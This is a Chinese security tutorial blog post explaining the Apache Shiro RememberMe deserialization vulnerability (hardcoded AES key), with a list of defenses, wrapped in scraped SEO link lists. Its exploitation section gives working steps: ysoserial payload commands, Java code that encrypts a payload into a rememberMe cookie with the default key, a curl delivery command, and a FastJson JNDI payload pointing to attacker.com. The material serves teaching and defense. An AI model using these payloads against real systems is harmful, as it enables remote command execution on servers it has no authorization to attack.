当前位置: 首页 > wzjs >正文

耒阳网站开发网络广告营销案例分析

耒阳网站开发,网络广告营销案例分析,郑州做企业网站,手机百度搜索引擎入口引言 在Web安全的世界里,反序列化漏洞一直是最危险的漏洞类型之一。今天,我们将深入探讨Apache Shiro框架中的两个著名反序列化漏洞.通过通俗易懂的解释和详细的实例,帮助你理解这类漏洞的本质和危害。 Shiro框架与"记住我"功能简…

引言

在Web安全的世界里,反序列化漏洞一直是最危险的漏洞类型之一。今天,我们将深入探讨Apache Shiro框架中的两个著名反序列化漏洞.通过通俗易懂的解释和详细的实例,帮助你理解这类漏洞的本质和危害。

Shiro框架与"记住我"功能简介

Apache Shiro是Java世界中广泛使用的安全框架,主要用于实现用户认证、授权和会话管理功能。如果你曾在Java Web应用中看到过登录页面上的"记住我"选项,很可能背后就是Shiro在默默工作。

这个"记住我"(RememberMe)功能的核心逻辑是:

  1. 用户勾选"记住我"并成功登录
  2. Shiro将用户身份信息存入cookie
  3. 用户下次访问时,即使关闭过浏览器,系统也能识别用户身份

听起来很方便,但正是这个功能存在严重安全隐患。

Java序列化与反序列化基础

在理解漏洞前,先简单了解一下Java中的序列化与反序列化:

  • 序列化:将Java对象转换为字节序列的过程,便于存储或传输
  • 反序列化:将字节序列恢复为Java对象的过程

基本的Java序列化代码如下:

// 序列化示例
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(userObject);  // 将对象序列化
byte[] serializedData = baos.toByteArray();// 反序列化示例
ByteArrayInputStream bais = new ByteArrayInputStream(serializedData);
ObjectInputStream ois = new ObjectInputStream(bais);
Object restoredObject = ois.readObject();  // 这里可能有安全风险!

其中,readObject()方法是安全风险的关键点,因为它会在反序列化过程中执行对象中定义的特定方法。

"记住我"功能的工作流程

Shiro处理"记住我"功能的流程是:

当用户登录时(存储过程):

用户身份信息 → 序列化 → AES加密 → Base64编码 → RememberMe Cookie

当用户再次访问时(读取过程):

RememberMe Cookie → Base64解码 → AES解密 → 反序列化 → 用户身份信息

这个过程中最关键的问题是:

  1. Shiro使用了硬编码的AES密钥
  2. 解密后的数据通过不安全的方式进行反序列化

漏洞详细分析

通过调试Shiro源码,我们可以看到漏洞的关键所在:

// 序列化用户身份信息的代码
protected byte[] serialize(PrincipalCollection principals) {ByteArrayOutputStream baos = new ByteArrayOutputStream();BufferedOutputStream bos = new BufferedOutputStream(baos);try {ObjectOutputStream oos = new ObjectOutputStream(bos);oos.writeObject(principals);  // 将用户信息序列化oos.close();return baos.toByteArray();} catch (IOException e) {// 异常处理}
}// 加密序列化数据的代码
protected byte[] encrypt(byte[] serialized) {byte[] value = serialized;CipherService cipherService = getCipherService();if (cipherService != null) {ByteSource byteSource = cipherService.encrypt(serialized, getEncryptionCipherKey());value = byteSource.getBytes();}return value;
}// 反序列化代码 - 漏洞触发点
protected PrincipalCollection deserialize(byte[] serializedIdentity) {ByteArrayInputStream bais = new ByteArrayInputStream(serializedIdentity);ObjectInputStream ois = new ObjectInputStream(bais);try {return (PrincipalCollection)ois.readObject();  // 漏洞触发点!} finally {ois.close();bais.close();}
}

漏洞的两个关键点:

  1. 硬编码的AES密钥private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==")

  2. 不安全的反序列化ois.readObject()方法在没有任何验证的情况下执行

这就像是给银行保险柜装了一把所有人都知道密码的锁,而且保险柜还会自动执行里面放入的任何指令。

漏洞利用步骤

利用这个漏洞的过程可以分为四个步骤:

步骤1:构造恶意序列化对象

首先,我们需要一个能在反序列化时执行命令的对象。可以使用ysoserial工具生成:

java -jar ysoserial.jar URLDNS "http://dnslog.cn/xyz123" > urldns.txt

这里使用URLDNS链条是因为它只需要Java内置类,适合用来验证漏洞是否存在。它的工作原理是:

// URLDNS链条的核心原理
HashMap<URL, String> hashMap = new HashMap<>();
URL url = new URL("http://dnslog.cn/xyz123");// 通过反射修改URL的hashCode值,避免序列化时触发DNS请求
Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
f.setAccessible(true);
f.set(url, 0xdeadbeef);  // 先设置一个固定值// 将URL放入HashMap
hashMap.put(url, "test");// 重新设置hashCode为-1,确保反序列化时触发
f.set(url, -1);// 序列化对象
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("urldns.txt"));
oos.writeObject(hashMap);

当这个对象被反序列化时,HashMap会调用URL的hashCode方法,触发DNS请求。

步骤2:加密序列化对象

由于Shiro期望接收的是加密后的序列化数据,我们需要使用相同的加密方式处理恶意对象:

// 加密步骤
SecureRandom random = new SecureRandom();
byte[] iv = new byte[16];
random.nextBytes(iv);  // 生成随机初始化向量Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="), "AES"), new IvParameterSpec(iv));// 读取恶意序列化对象
byte[] evilBytes = Files.readAllBytes(Paths.get("urldns.txt"));
byte[] encryptedData = cipher.doFinal(evilBytes);// 组合IV和加密数据
byte[] combined = new byte[iv.length + encryptedData.length];
System.arraycopy(iv, 0, combined, 0, iv.length);
System.arraycopy(encryptedData, 0, combined, iv.length, encryptedData.length);// Base64编码
String rememberMeCookie = Base64.getEncoder().encodeToString(combined);

这段代码模拟了Shiro的加密流程:

  1. 生成随机IV
  2. 使用AES-CBC模式加密
  3. 将IV和加密数据拼接
  4. Base64编码

步骤3:发送恶意Cookie

将生成的cookie值放入HTTP请求中:

Cookie: rememberMe=AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0...

可以使用各种工具发送这个请求:

curl -v -H "Cookie: rememberMe=AAECAwQ..." http://vulnerable-server.com

步骤4:确认漏洞存在

如果使用URLDNS链,可以在DNS日志平台查看是否收到目标服务器的请求,从而确认漏洞存在。

进阶:命令执行利用链

URLDNS链只能验证漏洞存在,无法执行命令。要实现远程命令执行,需要使用更高级的利用链,如CommonsCollections系列。

老师特别提到了CommonsBeanUtils链和CommonsCollections链:

# 使用CommonsCollections3生成执行命令的payload
java -jar ysoserial.jar CommonsCollections3 "ping attacker.com" > cc3.bin# 使用CommonsBeanutils链
java -jar ysoserial.jar CommonsBeanutils1 "whoami" > cb1.bin

选择哪种利用链,取决于目标应用包含的依赖库:

  • 如果应用包含commons-collections库,可以使用CommonsCollections系列链
  • 如果应用包含commons-beanutils库,可以使用CommonsBeanutils链
  • 如果不确定,可以先用URLDNS链验证漏洞存在

Java反序列化链VS FastJson链

老师特别强调了一点:不能使用FastJson的链条攻击Shiro漏洞。这是因为它们是完全不同的反序列化机制:

Java原生反序列化 vs FastJson

  1. 数据格式不同

    • Java原生序列化使用二进制格式
    • FastJson使用JSON文本格式
  2. 触发机制不同

    • Java原生反序列化通过readObject()方法触发
    • FastJson通过解析JSON时调用setter/getter方法触发
  3. 实例对比

// Java原生序列化数据(二进制)
[二进制数据...]// FastJson数据(文本格式)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com:1389/Exploit","autoCommit":true
}

简单来说,这就像是两种完全不同的语言,即使它们都可能利用相同的类(如JdbcRowSetImpl),但触发方式完全不同,无法互相替代。

防御措施

了解了漏洞原理,我们可以采取以下措施防御:

  1. 更新Shiro版本:使用最新版本的Apache Shiro

  2. 自定义加密密钥

RememberMeManager rememberMeManager = new CookieRememberMeManager();
byte[] cipherKey = new SecureRandom().generateSeed(16); // 随机密钥
rememberMeManager.setCipherKey(cipherKey);
  1. 实施反序列化白名单:限制可被反序列化的类

  2. 如不需要,禁用RememberMe功能

总结

Shiro反序列化漏洞告诉我们一个重要的安全原则:永远不要使用硬编码密钥,尤其是在开源项目中。同时,对于任何反序列化操作,都应该进行严格的安全验证。

这个漏洞的利用过程也展示了现代Web安全的复杂性:从构造恶意对象,到模拟合法加密流程,再到成功触发漏洞执行命令,每一步都需要深入理解底层技术原理。

希望这篇文章能帮助你更好地理解反序列化漏洞的危害和防护方法,从而构建更安全的应用系统。


注:本文仅供安全研究与学习,请勿用于非法用途。在测试任何安全漏洞前,请确保获得合法授权。

http://www.dtcms.com/wzjs/226424.html

相关文章:

  • 湖北营销网站建设联系方式线上推广的渠道和方法
  • 网站开发什么语言最好b站视频推广网站400
  • 网站建设有哪些渠道产品推广平台排行榜
  • phpcms律师网站模板廊坊seo培训
  • 2023年免费b站入口seo专业优化方法
  • 微信服务号绑定网站吗网络推广代理
  • 互联网公司排名20年优化大师最新版本
  • 做饲料机的川工网站电商平台网站
  • 中山移动网站建设公司广西壮族自治区免费百度推广
  • 长沙做个网站多少钱合肥网站seo公司
  • 最简单网站开发软件网络广告推广方式
  • 宿州公司网站建设主流搜索引擎有哪些
  • 鸿运网站建设今日特大新闻新事
  • 站酷网如何接单it培训课程
  • 个人备案公司网站网站建设优化公司
  • 无锡哪家做网站好长春网站建设公司
  • 专门做流程图的网站sem搜索
  • ps 矢量素材网站seo搜索引擎实训心得体会
  • 网络服务类型有哪几种网站关键词优化工具
  • 有没有好的ppt网站做参考的百度自动驾驶技术
  • 昆明铁路局建设工程网站企点官网
  • 电子商务做网站百度seo优化工具
  • 大学营销型网站建设实训课程百度影音在线电影
  • wordpress毕业设计武汉关键词seo排名
  • 湘潭做网站价格问下磐石网络竞价账户托管的公司有哪些
  • 做一个网站能挣多少钱深圳网络推广营销
  • 手机网站比例尺寸营业推广策略有哪些
  • 网站建设者属于广告经营者吗seo高端培训
  • 网上商城网站建设规划海外营销推广
  • 成都app制作开发公司安徽关键词seo